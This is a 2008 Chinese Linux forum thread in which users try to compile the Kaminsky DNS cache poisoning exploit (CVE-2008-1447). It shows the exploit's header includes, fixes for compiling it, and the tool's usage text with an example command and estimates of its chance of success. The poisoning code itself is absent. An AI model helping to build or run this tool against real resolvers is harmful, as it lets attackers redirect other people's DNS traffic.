LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 3161|回复: 7

这就是目前通杀所有操作系统的DNS攻击代码

[复制链接]
发表于 2008-7-30 14:11:08 | 显示全部楼层 |阅读模式
Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack

URL:http://www.milw0rm.com/exploits/6130

#define _BSD_SOURCE

#include <sys/types.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <time.h>
#include <unistd.h>
#include <dumbnet.h>


哪位大大帮忙给编译一下把执行文件传上来,谢了
 楼主| 发表于 2008-7-30 14:38:59 | 显示全部楼层

目前通杀所有操作系统的DNS攻击代码

Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack

URL:http://www.milw0rm.com/exploits/6130

#define _BSD_SOURCE

#include <sys/types.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <time.h>
#include <unistd.h>
#include <dumbnet.h>


哪位大大帮忙给编译一下把执行文件传上来,谢了
回复 支持 反对

使用道具 举报

发表于 2008-7-30 15:38:47 | 显示全部楼层
安装libdnet-devel即可啊,你不能编译么?
回复 支持 反对

使用道具 举报

发表于 2008-7-30 15:49:34 | 显示全部楼层
#include <dumbnet.h>
改为
#include <dnet.h>
即可编译
回复 支持 反对

使用道具 举报

发表于 2008-7-30 16:08:05 | 显示全部楼层
文件头的备注不是有说明编译方法吗?
/*
* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack
*
* Compilation:
* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm
*
* Dependency: libdnet (aka libdumbnet-dev under Ubuntu)
*
* Author: marc.bevand at rapid7 dot com
*/
回复 支持 反对

使用道具 举报

发表于 2008-7-30 16:32:55 | 显示全部楼层
  1. Usage: kaminsky-attack <ip-querier> <ip-resolver> <ip-authoritative> <port-resolver>
  2. <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>
  3.   <ip-querier>       Source IP used when sending queries for random hostnames
  4.                      (typically your IP)
  5.   <ip-resolver>      Target DNS resolver to attack
  6.   <ip-authoritative> One of the authoritative DNS servers for <domain>
  7.   <port-resolver>    Source port used by the resolver when forwarding queries
  8.   <subhost>          Poison the cache with the A record <subhost>.<domain>
  9.   <domain>           Domain name, see <subhost>.
  10.   <any-ip>           IP of your choice to be associated to <subhost>.<domain>
  11.   <attempts>         Number of poisoning attemps, more attempts increase the
  12.                      chance of successful poisoning, but also the attack time
  13.   <repl-per-attempt> Number of spoofed replies to send per attempt, more replies
  14.                      increase the chance of successful poisoning but, but also
  15.                      the rate of packet loss
  16. Example:
  17.   $ kaminsky-attack q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16
  18. This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear
  19. in r.r.r.r's cache. The chance of successfully poisoning the resolver with
  20. this example (8192 attempts and 16 replies/attempt) is 86%
  21. (1-(1-16/65536)**8192). This example also requires a bandwidth of about
  22. 2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *
  23. 8 bits/byte) and takes about 80 secs to complete (8192 attempts /
  24. 100 attempts/sec).
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复 支持 反对

使用道具 举报

发表于 2008-7-30 20:36:43 | 显示全部楼层
不知道怎么用
回复 支持 反对

使用道具 举报

发表于 2008-10-13 13:04:46 | 显示全部楼层
debian下加入libdnet和libdnet-dev,无法通过编译,好多的error,还没仔细看代码。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表